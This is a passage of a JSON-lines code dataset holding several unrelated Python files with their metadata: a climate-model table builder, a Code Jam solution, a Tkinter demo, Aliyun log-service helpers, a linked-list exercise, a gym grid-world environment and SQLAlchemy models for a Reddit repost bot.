import *\r\nfrom cmip5q.protoq.models import NumericalRequirement\r\n\r\n\r\ndef modeldesctable(models):\r\n ''' Generates all information necessary for AR5 table 1 (i.e. the model \r\n description table)\r\n \r\n '''\r\n \r\n for m in models:\r\n \r\n # 0. get top level info\r\n \r\n #Get the main model reference(s)\r\n m.mainrefs, m.maincits = get_Refs(m, 'model')\r\n \r\n # 1. 
Get aerosol column information\r\n \r\n #Check that realm is implemented\r\n m.aerimplemented = is_compimpl(m, 'Aerosols')\r\n\r\n if not m.aerimplemented:\r\n m.aerabbrev = m.aerrefs = m.aercits = 'Not Implemented' \r\n else:\r\n #Get the abbrev\r\n m.aerabbrev = get_compabbrev(m, 'Aerosols')\r\n #Get the component references\r\n m.aerrefs, m.aercits = get_Refs(m, 'Aerosols') \r\n\r\n # 2. Get atmosphere column information\r\n \r\n #Check that realm is implemented\r\n m.atmosimplemented = is_compimpl(m, 'Atmosphere')\r\n if m.atmosimplemented:\r\n #Get the abbrev\r\n m.atmosabbrev = get_compabbrev(m, 'Atmosphere')\r\n #Get the component references\r\n m.atmosrefs, m.atmoscits = get_Refs(m, 'Atmosphere')\r\n #Get vertical grid info\r\n m.atmosgridtop, m.atmosnumlevels = get_vertgridinfo(m, 'Atmosphere')\r\n #Get horizontal grid menmonic and resolution\r\n atmosgridres, atmosgridmnem = get_HorGridRes(m, 'Atmosphere', \r\n mnemonic=True)\r\n m.atmoshorgrid = atmosgridmnem+' '+ atmosgridres\r\n \r\n \r\n # 3. Get atmospheric chemistry column information\r\n \r\n #Check that realm is implemented\r\n m.atmchemimplemented = is_compimpl(m, 'AtmosphericChemistry')\r\n if not m.atmchemimplemented:\r\n m.atmchemabbrev = m.atmchemrefs = m.atmchemcits = 'Not Implemented' \r\n else:\r\n #Get the abbrev\r\n m.atmchemabbrev = get_compabbrev(m, 'AtmosphericChemistry')\r\n #Get the component references\r\n m.atmchemrefs, m.atmchemcits = get_Refs(m, 'AtmosphericChemistry')\r\n \r\n \r\n # 4. Get land ice column information\r\n \r\n #Check that realm is implemented\r\n m.liceimplemented = is_compimpl(m, 'LandIce')\r\n if not m.liceimplemented:\r\n m.liceabbrev = m.licerefs = m.licecits = 'Not Implemented' \r\n else:\r\n #Get the abbrev\r\n m.liceabbrev = get_compabbrev(m, 'LandIce')\r\n #Get the component references\r\n m.licerefs, m.licecits = get_Refs(m, 'LandIce')\r\n \r\n \r\n # 5. Get land surface column information\r\n \r\n #Check that realm is implemented\r\n m.lsurfimplemented = is_compimpl(m, 'LandSurface')\r\n if not m.lsurfimplemented:\r\n m.lsurfabbrev = m.lsurfrefs = m.lsurfcits = 'Not Implemented'\r\n else:\r\n #Get the abbrev\r\n m.lsurfabbrev = get_compabbrev(m, 'LandSurface')\r\n #Get the component references\r\n m.lsurfrefs, m.lsurfcits = get_Refs(m, 'LandSurface')\r\n \r\n \r\n # 6. Get Ocean Biogeo column information\r\n \r\n #Check that realm is implemented\r\n m.obgcimplemented = is_compimpl(m, 'OceanBiogeoChemistry')\r\n if not m.obgcimplemented:\r\n m.obgcabbrev = m.obgcrefs = m.obgccits = 'Not Implemented'\r\n else:\r\n #Get the abbrev\r\n m.obgcabbrev = get_compabbrev(m, 'OceanBiogeoChemistry')\r\n #Get the component references\r\n m.obgcrefs, m.obgccits = get_Refs(m, 'OceanBiogeoChemistry')\r\n \r\n \r\n # 7. 
Get Ocean information\r\n \r\n #Check that realm is implemented\r\n m.oceanimplemented = is_compimpl(m, 'Ocean')\r\n if not m.oceanimplemented:\r\n m.oceanabbrev = 'Not Implemented' \r\n m.oceanrefs = 'Not Implemented'\r\n m.oceancits = 'Not Implemented'\r\n m.oceanhorgrid = 'Not Implemented'\r\n m.oceannumlevels = 'Not Implemented'\r\n m.oceanzcoord = 'Not Implemented'\r\n m.oceantoplevel = 'Not Implemented'\r\n m.oceantopbc = 'Not Implemented'\r\n else:\r\n #Get the abbrev\r\n m.oceanabbrev = get_compabbrev(m, 'Ocean')\r\n #Get the component references\r\n m.oceanrefs, m.oceancits = get_Refs(m, 'Ocean')\r\n #Get vert grid info\r\n m.oceantoplevel, m.oceannumlevels = get_vertgridinfo(m, 'Ocean')\r\n #Get the ocean grid z co-ordinate\r\n m.oceanzcoord = get_ZCoord(m, 'Ocean')\r\n #Get the ocean top BC\r\n m.oceantopbc = get_oceanTopBC(m)\r\n #Get horizontal grid menmonic and resolution\r\n oceangridres, oceangridmnem = get_HorGridRes(m, 'Ocean', \r\n mnemonic=True)\r\n m.oceanhorgrid = oceangridmnem+' '+ oceangridres\r\n \r\n \r\n # 8. Get Sea Ice column information\r\n \r\n #Check that realm is implemented\r\n m.seaiceimplemented = is_compimpl(m, 'SeaIce')\r\n if not m.seaiceimplemented:\r\n m.seaiceabbrev = m.seaicerefs = m.seaicecits = 'Not Implemented'\r\n else:\r\n #Get the abbrev\r\n m.seaiceabbrev = get_compabbrev(m, 'SeaIce')\r\n #Get the component references\r\n m.seaicerefs, m.seaicecits = get_Refs(m, 'SeaIce')\r\n \r\n return models\r\n\r\n\r\ndef ch09table(models):\r\n '''\r\n Generates all information necessary for AR5 ch09 table \r\n '''\r\n \r\n for m in models: \r\n \r\n # Get Model assembly information including any related constraints\r\n m.modelassembly, \\\r\n m.assemblyotherinstitutes,\\\r\n m.assemblyconsortium, \\\r\n m.mixedassemblynames, \\\r\n m.offshelfinst = get_modelassembly(m)\r\n \r\n #get any additional info supplied under the model development section\r\n m.modeldevothers = get_modeldevothers(m)\r\n \r\n \r\n # Get Model Tuning information\r\n m.meanstateglobmets = get_meanstateglobmets(m)\r\n m.obstrendsmets = get_obstrendsmets(m)\r\n m.meanstateregmets = get_meanstateregmets(m)\r\n m.tempvarmets = get_tempvarmets(m)\r\n m.adjparams = get_adjparams(m)\r\n m.othmodtuning = get_othmodtuning(m)\r\n \r\n #get any additional info supplied under the tuning section\r\n m.tuningsectothers = get_tuningsectothers(m)\r\n \r\n # Get Conservation of integral quantities information\r\n m.intconservation = get_intconservation(m)\r\n m.spectuning = get_spectuning(m)\r\n m.fluxcorrused = get_fluxcorrused(m)\r\n if m.fluxcorrused == 'Yes':\r\n m.fluxcorrfields = get_fluxcorrfields(m)\r\n m.fluxcorrmeth = get_fluxcorrmeth(m)\r\n else:\r\n m.fluxcorrfields = ['N/A']\r\n m.fluxcorrmeth = 'N/A'\r\n \r\n #get any additional info supplied under the conservation of integral \r\n # quantities section\r\n m.consintegothers = get_consintegothers(m)\r\n \r\n return models\r\n\r\n\r\ndef chemtable(models):\r\n '''\r\n Generates all information necessary for AR5 chemistry table \r\n '''\r\n \r\n for m in models: \r\n \r\n # Is land surface carbon cycle implemented?\r\n m.lsccimplemented = is_compimpl(m, 'LandSurfaceCarbonCycle')\r\n # Is ocean bio chemistry (carbon cycle) implemented?\r\n m.occimplemented = is_compimpl(m, 'OceanBiogeoChemistry')\r\n \r\n # How are aerosols represented, mass/volume, number etc?\r\n m.aermoments = get_aermoments(m)\r\n \r\n # What type of aerosol model scheme\r\n m.aerscheme = get_aerscheme(m)\r\n \r\n # What type of aerosol model scheme\r\n 
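# Several realms above repeat the same implemented/abbrev/refs pattern. A sketch of
# a data-driven loop over those realms, assuming the is_compimpl, get_compabbrev,
# and get_Refs helpers imported at the top of this module; this is a refactor
# sketch, not the questionnaire's own code.
REALM_PREFIXES = (
    ('Aerosols', 'aer'),
    ('AtmosphericChemistry', 'atmchem'),
    ('LandIce', 'lice'),
    ('LandSurface', 'lsurf'),
    ('OceanBiogeoChemistry', 'obgc'),
    ('SeaIce', 'seaice'),
)

def set_realm_basics(m):
    # One pass sets <prefix>implemented, <prefix>abbrev, <prefix>refs and
    # <prefix>cits for every realm, mirroring the repeated blocks above.
    for realm, prefix in REALM_PREFIXES:
        implemented = is_compimpl(m, realm)
        setattr(m, prefix + 'implemented', implemented)
        if implemented:
            setattr(m, prefix + 'abbrev', get_compabbrev(m, realm))
            refs, cits = get_Refs(m, realm)
        else:
            setattr(m, prefix + 'abbrev', 'Not Implemented')
            refs = cits = 'Not Implemented'
        setattr(m, prefix + 'refs', refs)
        setattr(m, prefix + 'cits', cits)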
m.ocbiotracnuts = get_ocbiotracnuts(m)\r\n \r\n \r\n return models\r\n\r\n\r\ndef ar5table2(exps):\r\n '''\r\n Generates all information necessary for AR5 table 2 (i.e. the experiment \r\n description table) \r\n '''\r\n \r\n # Harvest all numerical requirements, omitting duplicates\r\n reqidlist = []\r\n reqlist = []\r\n \r\n for e in exps:\r\n for req in e.requirements.all():\r\n #first bind the req to the experiment for the template\r\n # Check for duplicate using docid\r\n if req.docid not in reqidlist:\r\n reqidlist.append(req.docid)\r\n reqlist.append(req)\r\n \r\n # Now assign true/false to individual experiment reqs if in global reqlist \r\n for e in exps:\r\n reqsinexp = []\r\n for reqid in reqidlist:\r\n if reqid in e.requirements.all().values_list('docid', flat=True):\r\n reqsinexp.append('True')\r\n else:\r\n reqsinexp.append('')\r\n \r\n e.reqsinexp = reqsinexp\r\n \r\n return reqlist, exps\r\n \r\n \r\ndef ar5table3(exps, model):\r\n '''\r\n Generates all information necessary for AR5 table 2 (i.e. the experiment \r\n description table) \r\n '''\r\n \r\n # Harvest all numerical requirements, omitting duplicates\r\n reqidlist = []\r\n reqlist = []\r\n \r\n for e in exps:\r\n for req in e.requirements.all():\r\n #first bind the req to the experiment for the template\r\n # Check for duplicate using docid\r\n if req.docid not in reqidlist:\r\n reqidlist.append(req.docid)\r\n reqlist.append(req)\r\n \r\n # Now assign true/false to individual experiment reqs if in global reqlist \r\n for e in exps:\r\n reqsinexp = []\r\n modconforms = []\r\n for reqid in reqidlist:\r\n if reqid in e.requirements.all().values_list('docid', flat=True):\r\n reqsinexp.append('True')\r\n #get the sim using the particular model for this experiment\r\n sim = Simulation.objects.filter(numericalModel=model, \r\n experiment=e)\r\n sim = sim.filter(isDeleted='False')\r\n # check current model conforms if it has been run for this exp\r\n if sim:\r\n #first get all reqs associated with the experiment\r\n ereqs = e.requirements.all()\r\n #get the actual requirement\r\n reqs = GenericNumericalRequirement.objects.filter(\r\n docid=reqid)\r\n #pull out the common requirement (must be better \r\n #way of doing this!)\r\n \r\n conf = Conformance.objects.filter(simulation=sim[0]).filter(\r\n requirement=req)\r\n modconforms.append('True')\r\n else:\r\n modconforms.append('') \r\n else:\r\n reqsinexp.append('')\r\n #mark conformance line as empty (ie doesn't come into play here)\r\n modconforms.append('')\r\n \r\n e.reqsinexp = reqsinexp\r\n e.modconforms = modconforms\r\n\r\n return reqlist, exps\r\n\r\n # Now assign conformant/not conformant/not applicable for each model\r\n # to individual experiment reqs\r\n for e in exps:\r\n #get the simulation using the particular model for this experiment\r\n sim = Simulation.objects.filter(numericalModel=model, experiment=e)\r\n sim = sim.filter(isDeleted='False')\r\n\r\n #get the confomances for this simulation\r\n confs = Conformance.objects.filter(simulation=sim[0])\r\n\r\n #iterate through and tag conformance existance/type\r\n modelconforms = []\r\n\r\n for reqid in reqidlist:\r\n if reqid in e.requirements.all().values_list('docid', flat=True):\r\n reqsinexp.append('True')\r\n else:\r\n reqsinexp.append('')\r\n\r\n e.reqsinexp = reqsinexp\r\n\r\n return reqlist, exps\r\n\r\n\r\ndef strattable(models):\r\n '''\r\n Generates all information necessary for strat model table\r\n '''\r\n\r\n for m in models:\r\n # Get the main model reference(s)\r\n m.mainrefs, m.maincits = 
get_Refs(m, 'model')\r\n\r\n # Atmosphere information\r\n m.atmosimplemented = is_compimpl(m, 'Atmosphere')\r\n if m.atmosimplemented:\r\n # Get the abbrev\r\n m.atmosabbrev = get_compabbrev(m, 'Atmosphere')\r\n # Get the component references\r\n m.atmosrefs, m.atmoscits = get_Refs(m, 'Atmosphere')\r\n # Get vert grid info\r\n m.atmosgridtop, m.atmosnumlevels = get_vertgridinfo(m,\r\n 'Atmosphere')\r\n # Get horizontal grid menmonic and resolution\r\n atmosgridres, atmosgridmnem = get_HorGridRes(m, 'Atmosphere',\r\n mnemonic=True)\r\n m.atmoshorgrid = atmosgridmnem + ' ' + atmosgridres\r\n # Get OR values\r\n m.oroggwsrcs, m.oroggwsrcurl = get_orvalues(m,\r\n sciencetype='AtmosOrographyAndWaves',\r\n pgname='OrographicGravityWaves',\r\n bpname='SourceMechanisms')\r\n m.oroggwprop, m.oroggwpropurl = get_xorvalue(m,\r\n sciencetype='AtmosOrographyAndWaves',\r\n pgname='OrographicGravityWaves',\r\n bpname='PropagationScheme')\r\n m.oroggwdiss, m.oroggwdissurl = get_xorvalue(m,\r\n sciencetype='AtmosOrographyAndWaves',\r\n pgname='OrographicGravityWaves',\r\n bpname='DissipationScheme')\r\n\r\n # Atmospheric chemistry column information\r\n m.atmchemimplemented = is_compimpl(m, 'AtmosphericChemistry')\r\n if m.atmchemimplemented:\r\n # Get the abbrev\r\n m.atmchemabbrev = get_compabbrev(m, 'AtmosphericChemistry')\r\n # Get the component references\r\n m.atmchemrefs, m.atmchemcits = get_Refs(m, 'AtmosphericChemistry')\r\n # Get OR values\r\n m.strathetchemgas, m.strathetchemgasurl = get_orvalues(m,\r\n sciencetype='StratosphericHeterChem',\r\n pgname='Species',\r\n bpname='GasPhase')\r\n m.strathetchemaer, m.strathetchemaerurl = get_orvalues(m,\r\n sciencetype='StratosphericHeterChem',\r\n pgname='Species',\r\n bpname='Aerosol')\r\n\r\n # Grid info\r\n if m.atmosimplemented:\r\n # Get vertical atmosphere grid info\r\n m.numlevels, \\\r\n m.topmodellevel, \\\r\n m.levsbelow850, \\\r\n m.levsabove200 = get_atmosvertgridinfo(m)\r\n\r\n return models\r\n","sub_path":"cmip5q/explorer/tableHandler.py","file_name":"tableHandler.py","file_ext":"py","file_size_in_byte":15456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"11823691","text":"#! 
/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport sys\n\n#sys.setrecursionlimit(1100)\n#sys.maxint\n#-sys.maxint-1\n\ndef calc_damage(P):\n damage = 0\n strength = 1\n for op in P:\n if op == 'S':\n damage += strength\n elif op == 'C':\n strength *= 2\n return damage\n\ndef count_(P):\n tbl = {}\n count_c = 0\n for op in P:\n if op == 'S':\n if count_c not in tbl:\n tbl[count_c] = 0\n tbl[count_c] += 1\n elif op == 'C':\n count_c += 1\n return tbl\n\ndef solve(D, P):\n damage = calc_damage(P)\n tbl = count_(P)\n count = 0\n while damage > D:\n r = sorted(tbl.items(), reverse=True)\n if len(r) == 0 or r[0][0] == 0:\n break\n\n damage -= pow(2, r[0][0]-1)\n tbl[r[0][0]] -= 1\n if tbl[r[0][0]] == 0:\n tbl.pop(r[0][0])\n\n if r[0][0]-1 not in tbl:\n tbl[r[0][0]-1] = 0\n tbl[r[0][0]-1] += 1\n count += 1\n\n return count if damage <= D else 'IMPOSSIBLE'\n\n\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n f = open(sys.argv[1])\n else:\n f = sys.stdin\n\n num_of_case = int(f.readline())\n for i in range(num_of_case):\n elms = f.readline().rstrip().split()\n answer = solve(int(elms[0]), list(elms[1]))\n print(\"Case #{}: {}\".format(i+1, answer), file=sys.stdout)\n\n# sort by key\n# for k,v in sorted(d.items())\n# sort by value\n# for k,v in sorted(d.items(), key=lambda x:x[1], reverse=True)\n# items() return tapple, tapple[0] is k, tapple[1] is v\n#\n# import copy\n# copy.copy()\n# copy.deepcopy()\n#\n# a = [0]*100\n#\n# for tc in xrange(1, int(sys.stdin.readline())+1):\n# A, B = [int(w) for w in sys.stdin.readline().split()]\n# p = [float(w) for w in sys.stdin.readline().split()]\n#\n# array = [[0 for j in range(m)] for i in range(n)]\n\n","sub_path":"2018_q/SavingUniverseAgain.py","file_name":"SavingUniverseAgain.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"552502002","text":"import tkinter as tk\nimport random\n\nroot = tk.Tk()\nroot.geometry('170x200+30+30')\n\nlanguages = ['Python', 'Perl', 'C++', 'Java', 'Tcl/Tk']\nlabels = range(5)\nfor i in range(5):\n ct = [random.randrange(256) for x in range(3)]\n brightness = int(round(0.299 * ct[0] + 0.587 * ct[1] + 0.114 * ct[2]))\n print(ct)\n ctHex = '{:02x}{:02x}{:02x}'.format(*tuple(ct))\n print(ctHex)\n bgColor = '#' + ''.join(ctHex)\n l = tk.Label(\n root, text=languages[i], fg='White' if brightness < 120 else 'Black', bg=bgColor)\n l.place(x=20, y=30 + i * 30, width=120, height=25)\n\nroot.mainloop()\n","sub_path":"Tutorial/GUI/Tkinter/pythonCourseTutorial/layout_place.py","file_name":"layout_place.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"556678579","text":"from .logexception import LogException\nimport six\nimport json\nfrom aliyun.log import *\nfrom concurrent.futures import ProcessPoolExecutor, as_completed\nimport multiprocessing\nfrom .logresponse import LogResponse\n\nMAX_INIT_SHARD_COUNT = 10\n\n\ndef copy_project(from_client, to_client, from_project, to_project, copy_machine_group=False):\n \"\"\"\n copy project, logstore, machine group and logtail config to target project,\n expecting the target project doens't exist\n :type from_client: LogClient\n :param from_client: logclient instance\n\n :type to_client: LogClient\n :param to_client: logclient instance\n\n :type from_project: string\n :param from_project: project name\n\n :type to_project: string\n :param to_project: project name\n\n :type copy_machine_group: 
bool\n    :param copy_machine_group: whether to copy machine group resources, False by default.\n\n\n    :return:\n    \"\"\"\n\n    # copy project\n    ret = from_client.get_project(from_project)\n    try:\n        ret = to_client.create_project(to_project, ret.get_description())\n    except LogException as ex:\n        if ex.get_error_code() == 'ProjectAlreadyExist':\n            # don't create the project as it already exists\n            pass\n\n    default_fetch_size = 100\n\n    # list logstore and copy them\n    offset, size = 0, default_fetch_size\n    while True:\n        ret = from_client.list_logstore(from_project, offset=offset, size=size)\n        count = ret.get_logstores_count()\n        total = ret.get_logstores_total()\n        for logstore_name in ret.get_logstores():\n            # copy logstore\n            ret = from_client.get_logstore(from_project, logstore_name)\n            ret = to_client.create_logstore(to_project, logstore_name, ret.get_ttl(),\n                                            min(ret.get_shard_count(), MAX_INIT_SHARD_COUNT))\n\n            # copy index\n            try:\n                ret = from_client.get_index_config(from_project, logstore_name)\n                ret = to_client.create_index(to_project, logstore_name, ret.get_index_config())\n            except LogException as ex:\n                if ex.get_error_code() == 'IndexConfigNotExist':\n                    pass\n\n        offset += count\n        if count < size or offset >= total:\n            break\n\n    # list logtail config and copy them\n    offset, size = 0, default_fetch_size\n    while True:\n        ret = from_client.list_logtail_config(from_project, offset=offset, size=size)\n        count = ret.get_configs_count()\n        total = ret.get_configs_total()\n\n        for config_name in ret.get_configs():\n            ret = from_client.get_logtail_config(from_project, config_name)\n            ret = to_client.create_logtail_config(to_project, ret.logtail_config)\n\n        offset += count\n        if count < size or offset >= total:\n            break\n\n    # list machine group and copy them\n    offset, size = 0, default_fetch_size\n    while copy_machine_group:\n        ret = from_client.list_machine_group(from_project, offset=offset, size=size)\n        count = ret.get_machine_group_count()\n        total = ret.get_machine_group_total()\n\n        for group_name in ret.get_machine_group():\n            ret = from_client.get_machine_group(from_project, group_name)\n            ret = to_client.create_machine_group(to_project, ret.get_machine_group())\n\n            # list all applied config and copy the relationship\n            ret = from_client.get_machine_group_applied_configs(from_project, group_name)\n            for config_name in ret.get_configs():\n                to_client.apply_config_to_machine_group(to_project, config_name, group_name)\n\n        offset += count\n        if count < size or offset >= total:\n            break\n\n\ndef list_more(fn, offset, size, batch_size, *args):\n    \"\"\"list all data using the fn\n    \"\"\"\n    if size < 0:\n        expected_total_size = six.MAXSIZE\n    else:\n        expected_total_size = size\n        batch_size = min(size, batch_size)\n\n    response = None\n    total_count_got = 0\n    while True:\n        ret = fn(*args, offset=offset, size=batch_size)\n        if response is None:\n            response = ret\n        else:\n            response.merge(ret)\n\n        count = ret.get_count()\n        total = ret.get_total()\n        offset += count\n        total_count_got += count\n        batch_size = min(batch_size, expected_total_size - total_count_got)\n\n        if count == 0 or offset >= total or total_count_got >= expected_total_size:\n            break\n\n    return response\n\n\ndef query_more(fn, offset, size, batch_size, *args):\n    \"\"\"list all data using the fn\n    \"\"\"\n    if size < 0:\n        expected_total_size = six.MAXSIZE\n    else:\n        expected_total_size = size\n        batch_size = min(size, batch_size)\n\n    response = None\n    total_count_got = 0\n    complete = False\n    while True:\n        ret = fn(*args, offset=offset, size=batch_size)\n\n        if response is None:\n            response = 
ret\n        else:\n            response.merge(ret)\n\n        # if the result is incomplete, stop paging\n        if not ret.is_completed():\n            break\n\n        count = ret.get_count()\n        offset += count\n        total_count_got += count\n        batch_size = min(batch_size, expected_total_size - total_count_got)\n        if count == 0 or total_count_got >= expected_total_size:\n            break\n\n    return response\n\n\ndef list_logstore_all(client, project):\n    \"\"\"\n    list all logstores of a project\n    :type client: LogClient\n    :param client: logclient instance\n\n    :return:\n    \"\"\"\n\n    default_fetch_size = 100\n\n    # page through all logstores\n    offset, size = 0, default_fetch_size\n    response = None\n    while True:\n        ret = client.list_logstores(project, offset=offset, size=size)\n        if response is None:\n            response = ret\n        else:\n            response.merge(ret)\n\n        count = ret.get_count()\n        total = ret.get_total()\n        offset += count\n        if count < size or offset >= total:\n            break\n\n    return response\n\n\ndef list_logtail_config_all(client, project):\n    \"\"\"\n    list all logtail configs of a project\n    :type client: LogClient\n    :param client: logclient instance\n\n    :return:\n    \"\"\"\n\n    default_fetch_size = 100\n\n    # page through all logtail configs\n    offset, size = 0, default_fetch_size\n    response = None\n    while True:\n        ret = client.list_logtail_config(project, offset=offset, size=size)\n        if response is None:\n            response = ret\n        else:\n            response.merge(ret)\n\n        count = ret.get_count()\n        total = ret.get_total()\n        offset += count\n        if count < size or offset >= total:\n            break\n\n    return response\n\n\ndef worker(client, project_name, logstore_name, from_time, to_time,\n           shard_id, file_path,\n           batch_size=1000, compress=True):\n    res = client.pull_log(project_name, logstore_name, shard_id, from_time, to_time, batch_size=batch_size,\n                          compress=compress)\n\n    count = 0\n    # keep the dump file open across all batches instead of re-opening it per log line\n    with open(file_path, \"a+\") as f:\n        for data in res:\n            for log in data.get_flatten_logs_json():\n                count += 1\n                f.write(json.dumps(log))\n                f.write(\"\\n\")\n\n    return file_path, count\n\n\ndef pull_log_dump(client, project_name, logstore_name, from_time, to_time, file_path, batch_size=500, compress=True):\n    cpu_count = multiprocessing.cpu_count() * 2\n    shards = client.list_shards(project_name, logstore_name).get_shards_info()\n    worker_size = min(cpu_count, len(shards))\n\n    result = dict()\n    total_count = 0\n    with ProcessPoolExecutor(max_workers=worker_size) as pool:\n        futures = [pool.submit(worker, client, project_name, logstore_name, from_time, to_time,\n                               shard_id=shard['shardID'], file_path=file_path.format(shard['shardID']),\n                               batch_size=batch_size, compress=compress)\n                   for shard in shards]\n\n        for future in as_completed(futures):\n            file_path, count = future.result()\n            total_count += count\n            if count:\n                result[file_path] = count\n\n    return LogResponse({}, {\"total_count\": total_count, \"files\": result})\n","sub_path":"aliyun/log/logclient_operator.py","file_name":"logclient_operator.py","file_ext":"py","file_size_in_byte":8118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"641713580","text":"# Definition for singly-linked list.\nclass ListNode(object):\n\n    def __init__(self, x):\n        self.val = x\n        self.next = None\n\n\nclass Solution(object):\n\n    def partition(self, head, x):\n        \"\"\"\n        :type head: ListNode\n        :type x: int\n        :rtype: ListNode\n        \"\"\"\n        p1, p2 = ListNode(0), ListNode(0)\n        hp1, hp2 = p1, p2\n        while head:\n            if head.val < x:\n                p1.next = head\n                p1 = p1.next\n            else:\n                p2.next = head\n                p2 = p2.next\n            head = head.next\n        p2.next = None\n        p1.next = hp2.next\n        return hp1.next\n\n\ndef arrToList(arr):\n    head = None  # stays None for an empty input list\n    temp = None\n    for x in reversed(arr):\n        head = 
ListNode(x)\n head.next = temp\n temp = head\n return head\n\n\ndef print_list(node):\n while node:\n print(node.val, end=\" \")\n node = node.next\n print()\n\n\ngiven = arrToList([1, 4, 3, 2, 5, 2])\ntest = Solution()\nresult = test.partition(given, 3)\nprint_list(result)\n","sub_path":"python/86 Partition List.py","file_name":"86 Partition List.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"323453833","text":"import gym\nfrom Viewer import Viewer\nfrom gym import spaces\nfrom gym.utils import seeding\n\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\nclass GridWorldEnv(gym.Env):\n metadata = {\n 'render.modes': ['human']\n }\n\n def __init__(self):\n self.width = 16\n self.height = 9\n self._cell_size = 10\n\n self.action_space = spaces.Discrete(4)\n self.observation_space = spaces.Box(self.height * self._cell_size, self.width * self._cell_size, 1)\n\n self.viewer = Viewer(width=self.width, height=self.height, cell_size=self._cell_size)\n\n self._seed()\n self.reset()\n\n def _seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def _step(self, action):\n assert self.action_space.contains(action), \"%r (%s) invalid\" % (action, type(action))\n self.viewer.move_agent(action)\n self.state = self.viewer.get_state()\n done = self.viewer.is_on_goal()\n reward = 1 if done else 0\n return self.state, reward, done, {}\n\n def _reset(self):\n self.viewer.reset_agent()\n self.state = self.viewer.get_state()\n return self.state\n\n def _render(self, mode='human', close=False):\n if close:\n if self.viewer is not None:\n self.viewer.close()\n self.viewer = None\n return\n return self.viewer.render()\n\n def set_grid_size(self, width, height):\n self.width = width\n self.height = height\n self.viewer = Viewer(height=self.height, width=self.width, cell_size=self._cell_size)\n self.reset()\n","sub_path":"ifqi/algorithms/selection/feature_selection/grid_world/grid_world/envs/gridworld_env.py","file_name":"gridworld_env.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"342590335","text":"from sqlalchemy import Column, Integer, String, DateTime, func, Boolean, Text, ForeignKey, Float, Index\nfrom sqlalchemy.dialects.postgresql import UUID\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship\n\nBase = declarative_base()\n\n\nclass Post(Base):\n\n def __lt__(self, other):\n return self.image_hash < other.image_hash\n\n def __repr__(self) -> str:\n return 'Post ID: {} - Type: {} - URL: {} - Source: {} - Created: {}'.format(self.post_id, self.post_type, self.url, self.ingested_from, self.created_at)\n\n # TODO - Move to_dict methods into JSON encoders\n\n __tablename__ = 'reddit_post'\n __table_args__ = (\n Index('ingest_source', 'created_at', 'ingested_from'),\n Index('ingest_graph', 'ingested_at', 'post_type', unique=False),\n Index('image_repost_check', 'post_type', 'checked_repost', 'crosspost_parent', 'dhash_h', unique=False),\n Index('image_hash', 'post_type', 'dhash_h', unique=False),\n )\n\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False, unique=True)\n url = Column(String(2000, collation='utf8mb4_general_ci'), nullable=False)\n shortlink = Column(String(300))\n perma_link = Column(String(1000, collation='utf8mb4_general_ci'))\n post_type = Column(String(20))\n author 
= Column(String(100), nullable=False)\n    selftext = Column(Text(75000, collation='utf8mb4_general_ci'))\n    created_at = Column(DateTime)\n    ingested_at = Column(DateTime, default=func.utc_timestamp())\n    subreddit = Column(String(100), nullable=False)\n    title = Column(String(1000, collation='utf8mb4_general_ci'), nullable=False)\n    crosspost_parent = Column(String(200))\n    dhash_v = Column(String(64))\n    dhash_h = Column(String(64))\n    ahash = Column(String(64))\n    checked_repost = Column(Boolean, default=False)\n    crosspost_checked = Column(Boolean, default=False)\n    last_deleted_check = Column(DateTime, default=func.utc_timestamp())\n    url_hash = Column(String(32)) # Needed to index URLs for faster lookups\n    ingested_from = Column(String(40))\n    left_comment = Column(Boolean, default=False)\n\n    bad_url = Column(Boolean, default=False)\n    repost_count = Column(Integer, default=0)\n    #fullname = Column(String(30))\n\n    def to_dict(self):\n        return {\n            'post_id': self.post_id,\n            'url': self.url,\n            'shortlink': self.shortlink,\n            'perma_link': self.perma_link,\n            'title': self.title,\n            'dhash_v': self.dhash_v,\n            'dhash_h': self.dhash_h,\n            'created_at': self.created_at.timestamp(),\n            'author': self.author,\n            'subreddit': self.subreddit\n        }\n\nclass RedditImagePost(Base):\n    __tablename__ = 'reddit_image_post'\n    __table_args__ = (\n        Index('create_at_index', 'created_at', unique=False),\n    )\n\n    id = Column(Integer, primary_key=True)\n    created_at = Column(DateTime)\n    post_id = Column(String(100), nullable=False, unique=True)\n    dhash_v = Column(String(64))\n    dhash_h = Column(String(64))\n\nclass RedditImagePostCurrent(Base):\n    __tablename__ = 'reddit_image_post_current'\n    # Dirty but we need to maintain a separate table to build indexes from\n    id = Column(Integer, primary_key=True)\n    created_at = Column(DateTime)\n    post_id = Column(String(100), nullable=False, unique=True)\n    dhash_v = Column(String(64))\n    dhash_h = Column(String(64))\n\n\nclass Summons(Base):\n    __tablename__ = 'reddit_bot_summons'\n    __table_args__ = (\n        Index('user_summons_check', 'requestor', 'summons_received_at', unique=False),\n    )\n\n    id = Column(Integer, primary_key=True)\n    post_id = Column(String(100), nullable=False)\n    requestor = Column(String(100))\n    comment_id = Column(String(100), unique=True)\n    comment_body = Column(String(1000, collation='utf8mb4_general_ci'))\n    comment_reply = Column(String(5000))\n    comment_reply_id = Column(String(100))\n    summons_received_at = Column(DateTime)\n    summons_replied_at = Column(DateTime)\n    subreddit = Column(String(100), nullable=False)\n\nclass BotComment(Base):\n    __tablename__ = 'reddit_bot_comment'\n\n    id = Column(Integer, primary_key=True)\n    post_id = Column(String(100), nullable=False)\n    comment_body = Column(String(2000, collation='utf8mb4_general_ci'))\n    perma_link = Column(String(1000, collation='utf8mb4_general_ci'))\n    